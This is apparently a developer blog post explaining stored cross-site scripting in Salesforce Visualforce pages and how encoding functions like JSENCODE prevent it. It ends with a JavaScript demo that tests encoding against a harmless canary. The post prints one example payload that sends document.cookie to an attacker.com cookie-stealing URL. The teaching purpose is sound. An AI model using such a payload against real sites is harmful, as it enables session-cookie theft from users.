Continuing from my previous post, this time I would like to share what I know about Stored XSS.
Stored XSS is the form of cross-site scripting where an attacker can inject code into server-side pages permanently, so the script runs whenever some action is performed on the page.

In other words :
“Stored attacks are those where the injected code is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information.”

Let's have an example:
<apex:page>

<script>
function crossXSS()
{
    var xssExample = '{!Account.Name}';
}
</script>
<apex:form>
<apex:commandLink value="Click me" onclick="crossXSS();" />
</apex:form>

</apex:page>

Now suppose the Account Name is:
testName';1';document.location='http://www.attacker.com/cgi-bin/cookie.cgi?'%2Bdocument.cookie;var%20foo=';

This account name will always be present on the page inside the script block, and whenever the commandLink is clicked, "crossXSS" will be called and the rendered line will look like this:
var xssExample = 'testName';1';document.location='http://www.attacker.com/cgi-bin/cookie.cgi?'%2Bdocument.cookie;var%20foo=';

So again you can see that all the cookies will be sent to the attacker.com site.

As I suggested in my previous blog post, I will repeat those points here :).

To prevent this, Salesforce provides encoding functions that are available on Visualforce pages, such as:
JSENCODE, HTMLENCODE, JSINHTMLENCODE, URLENCODE, etc.

So the code explained above can be updated as:
var xssExample = '{!JSENCODE(Account.Name)}';

So the value merged into the script will now be encoded.
JSENCODE: to encode values used inside JavaScript.
HTMLENCODE: to encode values rendered as HTML.
JSINHTMLENCODE: when calling a JavaScript method from an HTML component and passing values to it.
URLENCODE: when building a URL on the page.
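As an added example (not code from the original post), the snippet below renders the same `var xssExample = '...'` line once with a raw merge value and once with a JSENCODE-style encoded value, then checks whether the stored value stayed inside the string literal. `jsEncode` is an approximation of Visualforce's JSENCODE written for this demo, and the stored account name is a constructed value in the shape of the payload above, with a harmless canary instead of a cookie exfiltration.

```javascript
// Approximation of Visualforce JSENCODE (assumption, not Salesforce's code):
// backslash-escape quote characters and backslashes, and \u-escape
// characters that could start markup or break a script block.
function jsEncode(value) {
  return String(value).replace(/[\\'"\n\r<>\/\u2028\u2029]/g, (ch) => {
    switch (ch) {
      case "\\": return "\\\\";
      case "'":  return "\\'";
      case '"':  return '\\"';
      case "\n": return "\\n";
      case "\r": return "\\r";
      default:   return "\\u" + ch.charCodeAt(0).toString(16).toUpperCase().padStart(4, "0");
    }
  });
}

// Mimic what the page renders for: var xssExample = '{!Account.Name}';
// With encode=true it mimics: var xssExample = '{!JSENCODE(Account.Name)}';
function renderScript(accountName, encode) {
  const merged = encode ? jsEncode(accountName) : accountName;
  return "var xssExample = '" + merged + "';";
}

// Scan the rendered line like a JS lexer would: find where the first
// single-quoted literal ends, honouring backslash escapes, and return
// whatever follows it. A safe render leaves only the terminating ";".
function codeAfterLiteral(script) {
  let i = script.indexOf("'") + 1;
  while (i < script.length) {
    if (script[i] === "\\") { i += 2; continue; } // skip escaped char
    if (script[i] === "'") break;                  // literal closed here
    i++;
  }
  return script.slice(i + 1).trim();
}

function literalIsIntact(script) {
  return codeAfterLiteral(script) === ";";
}

// Evaluate a rendered line and return the value the script actually sees.
// Only call this on the encoded render; the raw one would run the canary.
function decodedValue(script) {
  return new Function(script + " return xssExample;")();
}

// Constructed stored value in the shape of the post's payload (benign canary).
const STORED_NAME = "testName';canary=1;var foo='";

console.log(literalIsIntact(renderScript(STORED_NAME, false))); // false: broke out
console.log(literalIsIntact(renderScript(STORED_NAME, true)));  // true: contained
```

With encoding, `decodedValue` returns the original account name unchanged, so the fix loses no data; without it, everything after `testName` becomes executable code.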

Please feel free to ask the questions/doubts. Suggestions are appreciated.
